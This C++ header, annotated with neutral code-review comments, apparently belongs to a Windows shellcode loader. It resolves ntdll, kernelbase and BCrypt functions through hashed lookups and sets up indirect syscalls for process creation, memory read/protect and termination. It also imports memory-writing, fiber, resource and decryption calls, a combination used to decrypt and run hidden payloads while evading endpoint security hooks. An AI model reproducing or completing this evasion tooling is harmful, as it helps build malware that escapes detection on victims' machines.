#pragma once
#include "resolvers.h"
#include "types.h"
/*
 * NOTE(review): every object in this header is a non-inline global with a
 * dynamic initializer. `#pragma once` only stops double inclusion within one
 * translation unit; if this header is included from more than one .cpp each
 * TU gets its own definition and the link fails with duplicate symbols, so it
 * looks intended for inclusion from exactly one file (TODO confirm).
 * Initialisation happens in declaration order, so the module-handle lines
 * must stay above the function-pointer lines that read them.
 */

/* Module handles.
 * The numeric arguments are whatever GetLoadedDllHandleH (presumably declared
 * in resolvers.h) expects; how they are derived is not visible in this file.
 * None of the three handles is checked for NULL before being passed to
 * GetFunctionAddressH below. */
HMODULE hNT = GetLoadedDllHandleH(776560387);
HMODULE hBcrypt = LoadLibraryW(L"Bcrypt.dll");  // unqualified name: resolved by the loader's DLL search order, result unchecked
HMODULE hkb = GetLoadedDllHandleH(3314415166);

/* ntdll */
/* Function pointers resolved through GetFunctionAddressH(handle, number). The
 * pointer types (fNt*/fn*) are presumably from types.h. Style note: this group
 * mixes reinterpret_cast with C-style casts (NtWaitForSingleObject,
 * NtCreateEvent); both compile to the same conversion here. */
fNtWriteVirtualMemory NtWriteVirtualMemory = reinterpret_cast<fNtWriteVirtualMemory>(GetFunctionAddressH(hNT, 3966201525));
fNtAllocateVirtualMemory NtAllocateVirtualMemory = reinterpret_cast<fNtAllocateVirtualMemory>(GetFunctionAddressH(hNT, 3794193594));
fNtProtectVirtualMemory NtProtectVirtualMemory = reinterpret_cast<fNtProtectVirtualMemory>(GetFunctionAddressH(hNT, 3375077829));  // same numeric argument is reused for sysCallNtProtect below
fNtReadVirtualMemory NtReadVirtualMemory = reinterpret_cast<fNtReadVirtualMemory>(GetFunctionAddressH(hNT, 809892425));  // same numeric argument is reused for sysCallNtRead below
fRtlInitUnicodeString RtlInitUnicodeString = reinterpret_cast<fRtlInitUnicodeString>(GetFunctionAddressH(hNT, 3384575400));
fRtlCreateProcessParametersEx RtlCreateProcessParametersEx = reinterpret_cast<fRtlCreateProcessParametersEx>(GetFunctionAddressH(hNT, 3996204138));
fnNtWaitForSingleObject NtWaitForSingleObject = (fnNtWaitForSingleObject)GetFunctionAddressH(hNT, 3052521384);
fNtCreateEvent NtCreateEvent = (fNtCreateEvent)GetFunctionAddressH(hNT, 2283725253);

/* kernelbase */
/* Resolved from hkb; the e_ prefix keeps these from colliding with the
 * identically named Win32 declarations. Return values are not checked. */
fnConvertThreadToFiber e_ConvertThreadToFiber = (fnConvertThreadToFiber)GetFunctionAddressH(hkb, 695607944);
fnCreateFiber e_CreateFiber = (fnCreateFiber)GetFunctionAddressH(hkb, 267739959);
fnSwitchToFiber e_SwitchToFiber = (fnSwitchToFiber)GetFunctionAddressH(hkb, 3567794878);
fnFindResourceW e_FindResourceW = (fnFindResourceW)GetFunctionAddressH(hkb, 3756652973);
fnLoadResource e_LoadResource = (fnLoadResource)GetFunctionAddressH(hkb, 3201064692);
fnLockResource e_LockResource = (fnLockResource)GetFunctionAddressH(hkb, 1095194177);
fnSizeofResource e_SizeofResource = (fnSizeofResource)GetFunctionAddressH(hkb, 2048804358);

/* Bcrypt */
/* Resolved from hBcrypt, which comes from LoadLibraryW above; if that load
 * failed, hBcrypt is NULL and these lookups run against a null handle. */
fnBCryptOpenAlgorithmProvider e_BCryptOpenAlgorithmProvider = (fnBCryptOpenAlgorithmProvider)GetFunctionAddressH(hBcrypt, 4221130483);
fnBCryptGetProperty e_BCryptGetProperty = (fnBCryptGetProperty)GetFunctionAddressH(hBcrypt, 2942278670);
fnBCryptSetProperty e_BCryptSetProperty = (fnBCryptSetProperty)GetFunctionAddressH(hBcrypt, 3154873802);
fnBCryptGenerateSymmetricKey e_BCryptGenerateSymmetricKey = (fnBCryptGenerateSymmetricKey)GetFunctionAddressH(hBcrypt, 310260467);
fnBCryptDecrypt e_BCryptDecrypt = (fnBCryptDecrypt)GetFunctionAddressH(hBcrypt, 1772972920);
fnBCryptDestroyKey e_BCryptDestroyKey = (fnBCryptDestroyKey)GetFunctionAddressH(hBcrypt, 3493811731);
fnBCryptCloseAlgorithmProvider e_BCryptCloseAlgorithmProvider = (fnBCryptCloseAlgorithmProvider)GetFunctionAddressH(hBcrypt, 4284280008);

/* syscalls */
/* C linkage with zero initializers: these names are presumably referenced
 * from another file (an assembly or C source) -- TODO confirm. Their spelling
 * is therefore part of the exported symbol name; the "Proccess" typo in
 * dwNtCreateUserProccess can only be fixed together with every referencing
 * file, none of which is visible here. */
extern "C" {
// SSN Variables -- passed by address to GetSysCallByWalking below, which presumably fills them in
DWORD dwNtCreateUserProccess = 0;
DWORD dwNtReadVirtualMemory = 0;
DWORD dwNtProtectVirtualMemory = 0;
DWORD dwNtTerminateProcess = 0;
// SYSCALL Variables -- likewise passed by address to GetSysCallByWalking
UINT_PTR sysCallNtCreateProcess = 0;
UINT_PTR sysCallNtRead = 0;
UINT_PTR sysCallNtProtect = 0;
UINT_PTR sysCallNtTerminate = 0;
};  // trailing ';' after the extern "C" block is an empty declaration; harmless but unnecessary

/* Each call pairs one numeric argument with one (DWORD, UINT_PTR) out-pair.
 * The PVOID results land in single-letter namespace-scope globals (s, h, i, t),
 * which are easy to shadow accidentally from any code that includes this
 * header; whether anything reads them is not visible here, so they are left
 * as-is rather than renamed. */
PVOID s = GetSysCallByWalking(2050401239, &dwNtCreateUserProccess, &sysCallNtCreateProcess);
PVOID h = GetSysCallByWalking(809892425, &dwNtReadVirtualMemory, &sysCallNtRead);
PVOID i = GetSysCallByWalking(3375077829, &dwNtProtectVirtualMemory, &sysCallNtProtect);
PVOID t = GetSysCallByWalking(2224556388, &dwNtTerminateProcess, &sysCallNtTerminate);